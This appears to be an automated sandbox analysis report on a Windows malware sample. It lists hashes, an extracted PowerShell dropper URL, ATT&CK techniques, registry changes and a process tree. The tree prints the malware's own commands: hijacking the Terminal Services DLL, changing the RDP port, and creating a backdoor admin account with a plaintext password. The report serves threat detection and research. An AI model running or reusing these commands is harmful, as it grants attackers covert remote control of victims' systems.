fb0da3d1d73bcd19970b18199109682c3eadacf33c066a02d17f1dd1f38275b1

Analysis

max time kernel
37s
max time network
105s
platform
windows10_x64
resource
win10v20201028
submitted
15-11-2020 22:40

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

fb0da3d1d73bcd19970b18199109682c3eadacf33c066a02d17f1dd1f38275b1.exe
Size

3.4MB
MD5

e8b8bd2c147f0bf4aa3762b32b778351
SHA1

a022f98fc7f16cb849ea2b6826eedd077db2360b
SHA256

fb0da3d1d73bcd19970b18199109682c3eadacf33c066a02d17f1dd1f38275b1
SHA512

0f0591aa79c39bd01cc7fe9b654e2709975c0eb47dce2abb8ddd2d7b49be8015a94b8f284a5ce94295ed7ebcecf6ded4346702672271b665d8873040938c9a9b

Score

10^/10

persistence upx

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1

Signatures

Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Blacklisted process makes network request 9 IoCs

Processes:

powershell.exe

flow	pid	process
16	648	powershell.exe
18	648	powershell.exe
19	648	powershell.exe
20	648	powershell.exe
22	648	powershell.exe
24	648	powershell.exe
26	648	powershell.exe
28	648	powershell.exe
30	648	powershell.exe

Modifies RDP port number used by Windows 1 TTPs

Remote Desktop Protocol
T1076
Sets DLL path for service in the registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
\Windows\Branding\mediasrv.png	upx
\Windows\Branding\mediasvc.png	upx

Deletes itself 1 IoCs

Processes:

powershell.exe

pid process

4316 powershell.exe
Loads dropped DLL 2 IoCs

Processes:

pid process

3912
3912

pid	process
3912
3912

Modifies service 2 TTPs 2 IoCs

persistence

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

reg.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\TermService\parameters	reg.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDLL = "C:\\Windows\\branding\\mediasrv.png"	reg.exe

Drops file in Program Files directory 4 IoCs

Processes:

powershell.exe

description	ioc	process
File opened for modification	C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT	powershell.exe
File opened for modification	C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI	powershell.exe
File opened for modification	C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT	powershell.exe
File opened for modification	C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI	powershell.exe

Drops file in Windows directory 19 IoCs

Processes:

powershell.exepowershell.exe

description	ioc	process
File created	C:\Windows\branding\wupsvc.jpg	powershell.exe
File opened for modification	C:\Windows\branding\Basebrd	powershell.exe
File opened for modification	C:\Windows\branding\mediasvc.png	powershell.exe
File opened for modification	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIE865.tmp	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\branding\mediasrv.png	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_ptyet41g.5ba.ps1	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_1ccurbfw.erz.psm1	powershell.exe
File opened for modification	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIE7A6.tmp	powershell.exe
File opened for modification	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIE875.tmp	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe
File created	C:\Windows\branding\mediasrv.png	powershell.exe
File opened for modification	C:\Windows\branding\wupsvc.jpg	powershell.exe
File created	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP	powershell.exe
File opened for modification	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIE7C7.tmp	powershell.exe
File opened for modification	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat	powershell.exe
File created	C:\Windows\branding\mediasvc.png	powershell.exe
File opened for modification	C:\Windows\branding\ShellBrd	powershell.exe
File opened for modification	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIE854.tmp	powershell.exe

Modifies data under HKEY_USERS 217 IoCs

Processes:

powershell.exeWMIC.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map\57fd7ae31ab34c2c = ",33,HKCU,SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\Cache\\Extensible Cache,"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Flags = "33"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Description = "This zone contains all Web sites that are on your organization's intranet."	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Description = "This zone contains Web sites that you trust not to damage your computer or data."	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	WMIC.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\DisplayName = "Local intranet"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\DisplayName = "Internet"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\DisplayName = "Restricted sites"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\Icon = "inetcpl.cpl#00004481"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\CurrentLevel = "73728"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\LowIcon = "inetcpl.cpl#005425"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\1200 = "3"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\shell = "0"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\PMDisplayName = "Computer [Protected Mode]"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Flags = "219"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Description = "This zone contains all Web sites you haven't placed in other zones"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\CurrentLevel = "0"	powershell.exe
Set value (data)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZonesSecurityUpgrade = de4ef1e88fadd601	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map\e1be3f182420a0a0 = ",33,HKCU,Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones,"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\PMDisplayName = "My Computer [Protected Mode]"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Flags = "33"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\LowIcon = "inetcpl.cpl#005423"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnableNegotiate = "1"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\LowIcon = "inetcpl.cpl#005423"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\Flags = "33"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\CurrentLevel = "0"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\1200 = "0"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\1200 = "3"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\DisplayName = "Computer"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\CurrentLevel = "0"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\PMDisplayName = "Local intranet [Protected Mode]"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\https = "3"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Description = "This zone contains all Web sites that are on your organization's intranet."	powershell.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

2000 reg.exe
Runs net.exe

pid	process
2000	reg.exe

Script User-Agent 2 IoCs

Uses user-agent string associated with script host/environment.

Processes:

description	flow	ioc
HTTP User-Agent header	18	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	20	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 9 IoCs

Processes:

powershell.exepowershell.exe

pid	process
4316	powershell.exe
4316	powershell.exe
4316	powershell.exe
4316	powershell.exe
4316	powershell.exe
4316	powershell.exe
648	powershell.exe
648	powershell.exe
648	powershell.exe

Suspicious behavior: LoadsDriver 2 IoCs

Processes:

pid process

620
620

pid	process
620
620

Suspicious use of AdjustPrivilegeToken 77 IoCs

Processes:

powershell.exe

description	pid	process
Token: SeDebugPrivilege	4316	powershell.exe
Token: SeIncreaseQuotaPrivilege	4316	powershell.exe
Token: SeSecurityPrivilege	4316	powershell.exe
Token: SeTakeOwnershipPrivilege	4316	powershell.exe
Token: SeLoadDriverPrivilege	4316	powershell.exe
Token: SeSystemProfilePrivilege	4316	powershell.exe
Token: SeSystemtimePrivilege	4316	powershell.exe
Token: SeProfSingleProcessPrivilege	4316	powershell.exe
Token: SeIncBasePriorityPrivilege	4316	powershell.exe
Token: SeCreatePagefilePrivilege	4316	powershell.exe
Token: SeBackupPrivilege	4316	powershell.exe
Token: SeRestorePrivilege	4316	powershell.exe
Token: SeShutdownPrivilege	4316	powershell.exe
Token: SeDebugPrivilege	4316	powershell.exe
Token: SeSystemEnvironmentPrivilege	4316	powershell.exe
Token: SeRemoteShutdownPrivilege	4316	powershell.exe
Token: SeUndockPrivilege	4316	powershell.exe
Token: SeManageVolumePrivilege	4316	powershell.exe
Token: 33	4316	powershell.exe
Token: 34	4316	powershell.exe
Token: 35	4316	powershell.exe
Token: 36	4316	powershell.exe
Token: SeIncreaseQuotaPrivilege	4316	powershell.exe
Token: SeSecurityPrivilege	4316	powershell.exe
Token: SeTakeOwnershipPrivilege	4316	powershell.exe
Token: SeLoadDriverPrivilege	4316	powershell.exe
Token: SeSystemProfilePrivilege	4316	powershell.exe
Token: SeSystemtimePrivilege	4316	powershell.exe
Token: SeProfSingleProcessPrivilege	4316	powershell.exe
Token: SeIncBasePriorityPrivilege	4316	powershell.exe
Token: SeCreatePagefilePrivilege	4316	powershell.exe
Token: SeBackupPrivilege	4316	powershell.exe
Token: SeRestorePrivilege	4316	powershell.exe
Token: SeShutdownPrivilege	4316	powershell.exe
Token: SeDebugPrivilege	4316	powershell.exe
Token: SeSystemEnvironmentPrivilege	4316	powershell.exe
Token: SeRemoteShutdownPrivilege	4316	powershell.exe
Token: SeUndockPrivilege	4316	powershell.exe
Token: SeManageVolumePrivilege	4316	powershell.exe
Token: 33	4316	powershell.exe
Token: 34	4316	powershell.exe
Token: 35	4316	powershell.exe
Token: 36	4316	powershell.exe
Token: SeIncreaseQuotaPrivilege	4316	powershell.exe
Token: SeSecurityPrivilege	4316	powershell.exe
Token: SeTakeOwnershipPrivilege	4316	powershell.exe
Token: SeLoadDriverPrivilege	4316	powershell.exe
Token: SeSystemProfilePrivilege	4316	powershell.exe
Token: SeSystemtimePrivilege	4316	powershell.exe
Token: SeProfSingleProcessPrivilege	4316	powershell.exe
Token: SeIncBasePriorityPrivilege	4316	powershell.exe
Token: SeCreatePagefilePrivilege	4316	powershell.exe
Token: SeBackupPrivilege	4316	powershell.exe
Token: SeRestorePrivilege	4316	powershell.exe
Token: SeShutdownPrivilege	4316	powershell.exe
Token: SeDebugPrivilege	4316	powershell.exe
Token: SeSystemEnvironmentPrivilege	4316	powershell.exe
Token: SeRemoteShutdownPrivilege	4316	powershell.exe
Token: SeUndockPrivilege	4316	powershell.exe
Token: SeManageVolumePrivilege	4316	powershell.exe
Token: 33	4316	powershell.exe
Token: 34	4316	powershell.exe
Token: 35	4316	powershell.exe
Token: 36	4316	powershell.exe

Suspicious use of WriteProcessMemory 68 IoCs

Processes:

fb0da3d1d73bcd19970b18199109682c3eadacf33c066a02d17f1dd1f38275b1.exepowershell.execsc.exenet.execmd.execmd.exenet.execmd.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.execmd.execmd.execmd.exe

description	pid	process	target process
PID 4760 wrote to memory of 4316	4760	fb0da3d1d73bcd19970b18199109682c3eadacf33c066a02d17f1dd1f38275b1.exe	powershell.exe
PID 4760 wrote to memory of 4316	4760	fb0da3d1d73bcd19970b18199109682c3eadacf33c066a02d17f1dd1f38275b1.exe	powershell.exe
PID 4316 wrote to memory of 508	4316	powershell.exe	csc.exe
PID 4316 wrote to memory of 508	4316	powershell.exe	csc.exe
PID 508 wrote to memory of 908	508	csc.exe	cvtres.exe
PID 508 wrote to memory of 908	508	csc.exe	cvtres.exe
PID 4316 wrote to memory of 1844	4316	powershell.exe	reg.exe
PID 4316 wrote to memory of 1844	4316	powershell.exe	reg.exe
PID 4316 wrote to memory of 2000	4316	powershell.exe	reg.exe
PID 4316 wrote to memory of 2000	4316	powershell.exe	reg.exe
PID 4316 wrote to memory of 932	4316	powershell.exe	reg.exe
PID 4316 wrote to memory of 932	4316	powershell.exe	reg.exe
PID 4316 wrote to memory of 2268	4316	powershell.exe	net.exe
PID 4316 wrote to memory of 2268	4316	powershell.exe	net.exe
PID 2268 wrote to memory of 2376	2268	net.exe	net1.exe
PID 2268 wrote to memory of 2376	2268	net.exe	net1.exe
PID 4316 wrote to memory of 2440	4316	powershell.exe	cmd.exe
PID 4316 wrote to memory of 2440	4316	powershell.exe	cmd.exe
PID 2440 wrote to memory of 2728	2440	cmd.exe	cmd.exe
PID 2440 wrote to memory of 2728	2440	cmd.exe	cmd.exe
PID 2728 wrote to memory of 2892	2728	cmd.exe	net.exe
PID 2728 wrote to memory of 2892	2728	cmd.exe	net.exe
PID 2892 wrote to memory of 4372	2892	net.exe	net1.exe
PID 2892 wrote to memory of 4372	2892	net.exe	net1.exe
PID 4316 wrote to memory of 3332	4316	powershell.exe	cmd.exe
PID 4316 wrote to memory of 3332	4316	powershell.exe	cmd.exe
PID 3332 wrote to memory of 4464	3332	cmd.exe	cmd.exe
PID 3332 wrote to memory of 4464	3332	cmd.exe	cmd.exe
PID 4464 wrote to memory of 3036	4464	cmd.exe	net.exe
PID 4464 wrote to memory of 3036	4464	cmd.exe	net.exe
PID 3036 wrote to memory of 3516	3036	net.exe	net1.exe
PID 3036 wrote to memory of 3516	3036	net.exe	net1.exe
PID 4524 wrote to memory of 4484	4524	cmd.exe	net.exe
PID 4524 wrote to memory of 4484	4524	cmd.exe	net.exe
PID 4484 wrote to memory of 4624	4484	net.exe	net1.exe
PID 4484 wrote to memory of 4624	4484	net.exe	net1.exe
PID 4580 wrote to memory of 3824	4580	cmd.exe	net.exe
PID 4580 wrote to memory of 3824	4580	cmd.exe	net.exe
PID 3824 wrote to memory of 3984	3824	net.exe	net1.exe
PID 3824 wrote to memory of 3984	3824	net.exe	net1.exe
PID 4668 wrote to memory of 4748	4668	cmd.exe	net.exe
PID 4668 wrote to memory of 4748	4668	cmd.exe	net.exe
PID 4748 wrote to memory of 4720	4748	net.exe	net1.exe
PID 4748 wrote to memory of 4720	4748	net.exe	net1.exe
PID 4292 wrote to memory of 4468	4292	cmd.exe	net.exe
PID 4292 wrote to memory of 4468	4292	cmd.exe	net.exe
PID 4468 wrote to memory of 4472	4468	net.exe	net1.exe
PID 4468 wrote to memory of 4472	4468	net.exe	net1.exe
PID 2032 wrote to memory of 4032	2032	cmd.exe	net.exe
PID 2032 wrote to memory of 4032	2032	cmd.exe	net.exe
PID 4032 wrote to memory of 2328	4032	net.exe	net1.exe
PID 4032 wrote to memory of 2328	4032	net.exe	net1.exe
PID 2436 wrote to memory of 4700	2436	cmd.exe	net.exe
PID 2436 wrote to memory of 4700	2436	cmd.exe	net.exe
PID 4700 wrote to memory of 2044	4700	net.exe	net1.exe
PID 4700 wrote to memory of 2044	4700	net.exe	net1.exe
PID 5028 wrote to memory of 3928	5028	cmd.exe	WMIC.exe
PID 5028 wrote to memory of 3928	5028	cmd.exe	WMIC.exe
PID 4220 wrote to memory of 4300	4220	cmd.exe	WMIC.exe
PID 4220 wrote to memory of 4300	4220	cmd.exe	WMIC.exe
PID 552 wrote to memory of 396	552	cmd.exe	cmd.exe
PID 552 wrote to memory of 396	552	cmd.exe	cmd.exe
PID 396 wrote to memory of 648	396	cmd.exe	powershell.exe
PID 396 wrote to memory of 648	396	cmd.exe	powershell.exe

C:\Users\Admin\AppData\Local\Temp\fb0da3d1d73bcd19970b18199109682c3eadacf33c066a02d17f1dd1f38275b1.exe
"C:\Users\Admin\AppData\Local\Temp\fb0da3d1d73bcd19970b18199109682c3eadacf33c066a02d17f1dd1f38275b1.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4760

\??\c:\windows\System32\WindowsPowerShell\v1.0\powershell.exe
-ep bypass -f C:\Users\Admin\AppData\Local\Temp\get-points.ps1
2⤵
- Deletes itself
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4316

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\bsk1nuli\bsk1nuli.cmdline"
3⤵
- Suspicious use of WriteProcessMemory
PID:508

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7B02.tmp" "c:\Users\Admin\AppData\Local\Temp\bsk1nuli\CSC5AFA9353C6024F6DB26019D1805C12.TMP"
4⤵
PID:908

C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
3⤵
PID:1844

C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
3⤵
- Modifies service
- Modifies registry key
PID:2000

C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
3⤵
PID:932

C:\Windows\system32\net.exe
"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
3⤵
- Suspicious use of WriteProcessMemory
PID:2268

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
4⤵
PID:2376

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
3⤵
- Suspicious use of WriteProcessMemory
PID:2440

C:\Windows\system32\cmd.exe
cmd /c net start rdpdr
4⤵
- Suspicious use of WriteProcessMemory
PID:2728

C:\Windows\system32\net.exe
net start rdpdr
5⤵
- Suspicious use of WriteProcessMemory
PID:2892

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 start rdpdr
6⤵
PID:4372

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
3⤵
- Suspicious use of WriteProcessMemory
PID:3332

C:\Windows\system32\cmd.exe
cmd /c net start TermService
4⤵
- Suspicious use of WriteProcessMemory
PID:4464

C:\Windows\system32\net.exe
net start TermService
5⤵
- Suspicious use of WriteProcessMemory
PID:3036

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 start TermService
6⤵
PID:3516

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
3⤵
PID:416

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
3⤵
PID:960

C:\Windows\System32\cmd.exe
cmd /C net.exe user updwin Ghasar4f5 /del
1⤵
- Suspicious use of WriteProcessMemory
PID:4524

C:\Windows\system32\net.exe
net.exe user updwin Ghasar4f5 /del
2⤵
- Suspicious use of WriteProcessMemory
PID:4484

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user updwin Ghasar4f5 /del
3⤵
PID:4624

C:\Windows\System32\cmd.exe
cmd /C net.exe user updwin 6t6RXgqs /add
1⤵
- Suspicious use of WriteProcessMemory
PID:4580

C:\Windows\system32\net.exe
net.exe user updwin 6t6RXgqs /add
2⤵
- Suspicious use of WriteProcessMemory
PID:3824

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user updwin 6t6RXgqs /add
3⤵
PID:3984

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" updwin /ADD
1⤵
- Suspicious use of WriteProcessMemory
PID:4668

C:\Windows\system32\net.exe
net.exe LOCALGROUP "Remote Desktop Users" updwin /ADD
2⤵
- Suspicious use of WriteProcessMemory
PID:4748

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" updwin /ADD
3⤵
PID:4720

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" EWYCRADZ$ /ADD
1⤵
- Suspicious use of WriteProcessMemory
PID:4292

C:\Windows\system32\net.exe
net.exe LOCALGROUP "Remote Desktop Users" EWYCRADZ$ /ADD
2⤵
- Suspicious use of WriteProcessMemory
PID:4468

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" EWYCRADZ$ /ADD
3⤵
PID:4472

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Administrators" updwin /ADD
1⤵
- Suspicious use of WriteProcessMemory
PID:2032

C:\Windows\system32\net.exe
net.exe LOCALGROUP "Administrators" updwin /ADD
2⤵
- Suspicious use of WriteProcessMemory
PID:4032

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 LOCALGROUP "Administrators" updwin /ADD
3⤵
PID:2328

C:\Windows\System32\cmd.exe
cmd /C net.exe user updwin 6t6RXgqs
1⤵
- Suspicious use of WriteProcessMemory
PID:2436

C:\Windows\system32\net.exe
net.exe user updwin 6t6RXgqs
2⤵
- Suspicious use of WriteProcessMemory
PID:4700

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user updwin 6t6RXgqs
3⤵
PID:2044

C:\Windows\System32\cmd.exe
cmd.exe /C wmic path win32_VideoController get name
1⤵
- Suspicious use of WriteProcessMemory
PID:5028

C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
2⤵
- Modifies data under HKEY_USERS
PID:3928

C:\Windows\System32\cmd.exe
cmd.exe /C wmic CPU get NAME
1⤵
- Suspicious use of WriteProcessMemory
PID:4220

C:\Windows\System32\Wbem\WMIC.exe
wmic CPU get NAME
2⤵
PID:4300

